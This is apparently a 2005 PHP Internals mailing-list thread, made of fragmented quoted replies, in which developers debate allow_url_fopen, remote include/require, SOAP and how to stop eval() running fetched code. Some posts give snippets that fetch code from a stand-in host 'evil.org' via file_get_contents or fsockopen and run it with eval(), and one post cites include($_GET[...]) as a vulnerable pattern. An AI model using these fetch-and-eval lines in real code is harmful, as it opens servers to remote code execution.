Since comments were called for I thought I might weigh in
with my $0.02cdn
When configuring PHP I want a way to protect myself, and my users from
themselves when it comes to doing something silly, I've actually seen
include($_GET['function']) in running code, though thankfully never on
on
On 7/28/05, Sean Coates <[EMAIL PROTECTED]> wrote:
> >> That won't work, eval() is not a function...
> >
> > Ah yes, you're right... I guess we do need another INI setting.
>
> Or constructs-that-look-like-functions could be governed by
> disable_functions (eval, echo).. that would cause other pro
Ilia Alshanetsky wrote:
IMHO we should restrict or "disabling" code to just the
include/require constructs, since that is the main cause for concern.
Ultimately shy of disabling php's ability to request remote files
there is no way to prevent an attacker from fetching remote code and
then
At 04:52 PM 7/28/2005, Ilia Alshanetsky wrote:
It can already be done, disable_functions INI directive.
That won't work, eval() is not a function...
Zeev
--
PHP Internals - PHP Runtime Development Mailing List
To unsubscribe, visit: http://www.php.net/unsub.php
sure: eval('file_get_contents("http://evil.org");');
Ok, but there is nothing (allow_url_fopen does not work here) preventing
me from doing similar via:
$fp = fsockopen("evil.org", 80);
fwrite($fp, "GET /evil_code.txt HTTP/1.0\r\nHost: evil.org\r\n\r\n");
eval(stream_get_contents($fp));
Zeev Suraski wrote:
At 04:43 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
3. Introduce allow_remote_streams (effectively allow_url_fopens
renamed, except it doesn't affect include/require)
If this option is disabled, would it simply prevent loading URLs via
various file base
At 04:43 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
3. Introduce allow_remote_streams (effectively allow_url_fopens renamed,
except it doesn't affect include/require)
If this option is disabled, would it simply prevent loading URLs via
various file based functions and the like (
Zeev Suraski wrote:
I don't know, I think that if you aim that well you should be allowed to
shoot yourself in the foot :) If we go that far, then running code
from the database through eval() should also not be allowed, because it
may have been indirectly written to by remote users. Which b
On Jul 28, 2005, at 9:49 AM, Ilia Alshanetsky wrote:
sure: eval('file_get_contents("http://evil.org");');
Ok, but there is nothing (allow_url_fopen does not work here)
preventing me from doing similar via:
$fp = fsockopen("evil.org", 80);
$fp = fwrite($fp, "GET /evil_code.txt HTTP/1.0\
That won't work, eval() is not a function...
Ah yes, you're right... I guess we do need another INI setting.
Or constructs-that-look-like-functions could be governed by
disable_functions (eval, echo).. that would cause other problems (like a
disabled "return"), though.
S
Zeev Suraski wrote:
At 04:52 PM 7/28/2005, Ilia Alshanetsky wrote:
It can already be done, disable_functions INI directive.
That won't work, eval() is not a function...
Ah yes, you're right... I guess we do need another INI setting.
Ilia
At 04:39 PM 7/28/2005, George Schlossnagle wrote:
sure: eval('file_get_contents("http://evil.org");');
You could say this is just bad policy on the part of code authors,
but that's what these options were geared to handle in the first
place, right?
I don't know, I think that if you aim that
Zeev Suraski wrote:
3. Introduce allow_remote_streams (effectively allow_url_fopens
renamed, except it doesn't affect include/require)
If this option is disabled, would it simply prevent loading URLs via
various file based functions and the like (like allow_url_fopen now) or
will it also inclu
On Jul 28, 2005, at 9:28 AM, Zeev Suraski wrote:
At 04:21 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% disabled when
allow_url_fopen is off?
SOAP is not disabled, simply pr
At 04:21 PM 7/28/2005, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% disabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data sources
directly.
W
On Jul 28, 2005, at 9:21 AM, Ilia Alshanetsky wrote:
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% disabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources di
On Jul 28, 2005, at 9:10 AM, Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% disabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources directly.
What exactly ca
Zeev Suraski wrote:
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% disabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data
sources directly.
What exactly can you do with it other than query
At 01:50 AM 7/28/2005, Ilia Alshanetsky wrote:
Are you therefore saying SOAP support should be 100% disabled when
allow_url_fopen is off?
SOAP is not disabled, simply prevented from querying remote data sources
directly.
What exactly can you do with it other than query remote data sources?
I
Adam Maccabee Trachtenberg wrote:
I pretty much take it for granted that people are going to need to
fetch the WSDL file from a remote location.
Not to mention do anything useful with it, like run queries :-)
Are you therefore saying SOAP support should be 100% disabled when
allow_url_fopen is
On Wed, 27 Jul 2005, Sara Golemon wrote:
> (B) I don't think SOAP is one of those cases. I would be disappointed if
> SOAP allowed *any* calls to be made when allow_url_fopen is off.
I pretty much take it for granted that people are going to need to
fetch the WSDL file from a remote location.
A
Two answers:
(A) I do think an override is a good idea. There may be some cases where
extension code may need to hook a wrapper whether allow_url_fopen is enabled
or not. Granted the code could temporarily change that value, but that's a
hackish approach.
(B) I don't think SOAP is one of thos